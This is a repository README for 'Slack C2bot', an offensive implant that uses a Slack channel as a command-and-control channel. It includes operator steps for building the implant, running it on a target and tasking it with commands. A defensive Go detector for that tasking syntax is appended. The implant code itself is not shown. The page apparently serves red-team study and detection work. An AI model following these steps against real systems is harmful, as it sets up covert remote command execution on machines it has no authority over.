Slack C2bot that executes commands and returns the output.
README.md
build.sh Add files via upload Apr 18, 2019
implant.go

README.md

Slack C2bot

Slack C2bot that executes commands and returns the output.

Learn more by reading our full writeup: Using Slack as a Malicious C2 Vector: MITRE ATT&CK – Web Service (T1102)

Setup

Install Golang and requirements:

sudo apt install golang-go
sudo apt install git

Install the Slack library:

go get "github.com/nlopes/slack"

Usage

./build.sh [$CHANID] [$SLACKTOKEN]

The build script will generate a UUID for your bot.

If you don't already have a workspace, you will need to create one.

Once you have a workspace, open a channel and note the channel ID. This can be found by opening the channel in your browser; the URI has the form /messages/channelid/.

Save this as $CHANID.

Next, you will need to add a bot to your workspace. This can be done using the following steps:

  • Open https://api.slack.com/
  • Click Start building. Enter the name of the bot and the workspace.
  • On the left menu listing, click: OAuth & Permissions
  • Scroll down to Scopes. Add channels:history and chat:write:bot permissions.
  • Click save.
  • Scroll to the top of the page and click Install App to Workspace.
  • Click authorize on the new popup.

Next, note the Slack OAuth token. This can be found by opening Your Apps -> Click the bot -> OAuth & Permissions.

Save this as $SLACKTOKEN.

Run the build script.

./build.sh $CHANID $SLACKTOKEN

Run the Slack C2 bot on the target system.

./output/lin_implant.bin

Open the Slack channel.

After the bot checks in, you can task the bot to execute a command using the following syntax:

[UUID] run whoami

The bot will post the output.
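For defenders reviewing a workspace export, the tasking syntax above is a usable detection signal. The following is an added example, not code from this repository: it flags channel messages of the form "UUID run command". The Message and Hit types, the function names and the sample messages are hypothetical, and it assumes the UUID is in canonical 8-4-4-4-12 hex form with the square brackets optional.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Message is a hypothetical, minimal view of one exported channel message.
type Message struct {
	Channel, User, Text string
}

// Hit records a message that matches the tasking syntax "[UUID] run <command>".
type Hit struct {
	Channel, User, BotID, Command string
}

// Assumption: the UUID is in canonical 8-4-4-4-12 hex form; the square
// brackets shown in the README are treated as optional.
var tasking = regexp.MustCompile(`(?i)^\[?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\]?\s+run\s+(\S.*)$`)

// FindTasking returns every message whose text is a UUID followed by "run"
// and a command, the operator-to-bot pattern described in the README.
func FindTasking(msgs []Message) []Hit {
	var hits []Hit
	for _, m := range msgs {
		if g := tasking.FindStringSubmatch(strings.TrimSpace(m.Text)); g != nil {
			hits = append(hits, Hit{m.Channel, m.User, strings.ToLower(g[1]), g[2]})
		}
	}
	return hits
}

// sampleMessages is constructed test data, not captured traffic.
func sampleMessages() []Message {
	return []Message{
		{"C0EXAMPLE1", "U0EXAMPLE1", "can someone run the deploy job?"},
		{"C0EXAMPLE2", "U0EXAMPLE2", "3F2504E0-4F89-11D3-9A0C-0305E82C3301 run whoami"},
		{"C0EXAMPLE2", "U0EXAMPLE2", "[3f2504e0-4f89-11d3-9a0c-0305e82c3301] run id"},
		{"C0EXAMPLE2", "U0EXAMPLE3", "ticket 3f2504e0 is ready to run"},
	}
}

func main() {
	for _, h := range FindTasking(sampleMessages()) {
		fmt.Printf("channel=%s user=%s bot=%s command=%q\n", h.Channel, h.User, h.BotID, h.Command)
	}
}
```

Grouping hits by BotID shows how many distinct implants were tasked in a channel and which user account issued the commands.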
